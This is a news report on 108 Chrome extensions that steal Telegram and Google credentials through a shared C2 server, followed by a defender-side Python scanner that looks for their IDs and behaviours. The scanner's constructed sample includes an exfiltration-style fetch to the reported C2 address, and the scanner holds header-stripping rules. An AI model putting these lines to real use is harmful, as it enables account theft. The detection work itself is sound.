Data theft malware found on 108 other Chrome add-ons
Data theft malware has been detected in 108 more Chrome add-ons, hitting over 20,000 victims.
Web browser add-ons, or extensions, help browsers perform a variety of tasks and make life easier for users, but many fake, malicious add-ons have now been detected that cause users harm rather than convenience.
According to a report by The Hacker News, up to 108 fake Chrome web browser add-ons have been detected that all behave in the same way: they connect to the same C2 (command and control) infrastructure, contacting a C2 server located at 144.126.135[.]238. These add-ons share the same purpose: stealing credentials, user identity, and website visiting information. Worse still, 56 of the 108 add-ons are capable of stealing Google accounts through OAuth2, and 45 of them can act as a backdoor that the hackers use for the following activities:
Exfiltration of data from the Telegram chat application every 15 seconds
Removal of critical headers of WFP and YouTube, such as Content Security Policy, X-Frame-Options, and CORS, followed by code injection that displays online gambling website ads instead
Injection of a script that displays content chosen by the hackers on every website the victim visits
Redirecting (proxying) translation requests to the hackers' server
According to a research team from Socket, a cybersecurity specialist, the 108 add-ons come from just five publishers: Yana Project, GameGen, SideGames, Rodeo Games and InterAlt. With over 20,000 installations in total today, examples of the dangerous add-ons are as follows:
Telegram Multi-Account (ID: obifanppcpchlehkjipahhphbcbjekfa): an add-on that claims to let you use multiple Telegram accounts at the same time, but actually secretly steals the user_auth token, which is used to authenticate users on Telegram Web, and sends it back to the hackers. It can also overwrite localStorage with session data sent by the hackers, replacing the victim's session with the one the hackers want.
Web Client for Telegram - Teleside (ID: mdcfennpfgkngnibjbpnpaafcjnhcjno): able to remove Telegram's headers and then inject a script that steals the victim's account.
Formula Rush Racing Game (ID: akebbllmckjphjiojeioooidhnddnplj): used to steal Google accounts by tricking users into pressing a Sign-In button. The stolen data consists of emails, profile photos, full names, and Google account numbers.
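A defender-side triage script, added here as an example and not code from the article, Socket or The Hacker News: it checks a Chrome profile's unpacked extensions for the three IDs and the C2 address named above, for declarativeNetRequest rules that strip the protective headers listed under the backdoor activities, and for the identity permission plus oauth2 manifest block that a bait Sign-In button needs. The header list, the manifest heuristic and the constructed sample at the bottom are assumptions, not details from the report.

```python
import json
from pathlib import Path
KNOWN_BAD_IDS = {"obifanppcpchlehkjipahhphbcbjekfa",  # Telegram Multi-Account
                 "mdcfennpfgkngnibjbpnpaafcjnhcjno",  # Web Client for Telegram - Teleside
                 "akebbllmckjphjiojeioooidhnddnplj"}  # Formula Rush Racing Game
C2_ADDRESS = "144.126.135.238"  # reported C2 address (defanged in the article)
STRIPPED_HEADERS = {"content-security-policy", "x-frame-options", "access-control-allow-origin"}

def assess_extension(ext_id, manifest, dnr_rules, source_text):
    """Return findings for one unpacked extension; an empty list means nothing was flagged."""
    findings = []
    if ext_id in KNOWN_BAD_IDS:
        findings.append(f"id {ext_id} is on the reported list")
    if C2_ADDRESS in source_text:
        findings.append("source references the reported C2 address")
    # declarativeNetRequest rules that strip protective response headers (CSP, X-Frame-Options, CORS)
    for rule in dnr_rules:
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        for hdr in action.get("responseHeaders", []):
            if hdr.get("operation") == "remove" and hdr.get("header", "").lower() in STRIPPED_HEADERS:
                findings.append(f"rule {rule.get('id')} removes {hdr['header']}")
    # identity permission plus an oauth2 block is what a bait "Sign-In" button needs to obtain a Google token
    if "identity" in manifest.get("permissions", []) and "oauth2" in manifest:
        findings.append("can request Google OAuth2 tokens via chrome.identity")
    return findings

def scan_profile(profile_dir):
    """Walk <profile>/Extensions/<id>/<version>/ on disk and assess every installed extension."""
    results = {}
    for manifest_path in Path(profile_dir).glob("Extensions/*/*/manifest.json"):
        ext_dir, ext_id = manifest_path.parent, manifest_path.parent.parent.name
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        rule_files = [ext_dir / r.get("path", "")
                      for r in manifest.get("declarative_net_request", {}).get("rule_resources", [])]
        rules = [rule for f in rule_files if f.is_file() for rule in json.loads(f.read_text(encoding="utf-8"))]
        source = "".join(p.read_text(encoding="utf-8", errors="ignore") for p in ext_dir.rglob("*.js"))
        if findings := assess_extension(ext_id, manifest, rules, source):
            results[ext_id] = findings
    return results

# Constructed sample mirroring the reported behaviour; not code from any real extension.
SAMPLE_MANIFEST = {"permissions": ["identity"], "oauth2": {"client_id": "placeholder", "scopes": ["profile"]}}
SAMPLE_RULES = [{"id": 1, "condition": {"urlFilter": "web.telegram.org"}, "action": {"type": "modifyHeaders",
                "responseHeaders": [{"header": "Content-Security-Policy", "operation": "remove"}]}}]
def demo():
    return assess_extension("obifanppcpchlehkjipahhphbcbjekfa", SAMPLE_MANIFEST, SAMPLE_RULES,
                            f"fetch('http://{C2_ADDRESS}/collect')")
```

On a real machine, call scan_profile() with the path of a Chrome user profile directory (for example the Default profile under the Chrome user data directory) and review every extension it flags.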
The source does not indicate whether Google has yet removed these dangerous add-ons from the Web Store. It is not yet possible to determine who is behind this outrageous incident, but there is an assumption that hackers from Russia may be behind it because of the large number of Russian-language strings in the add-ons' code.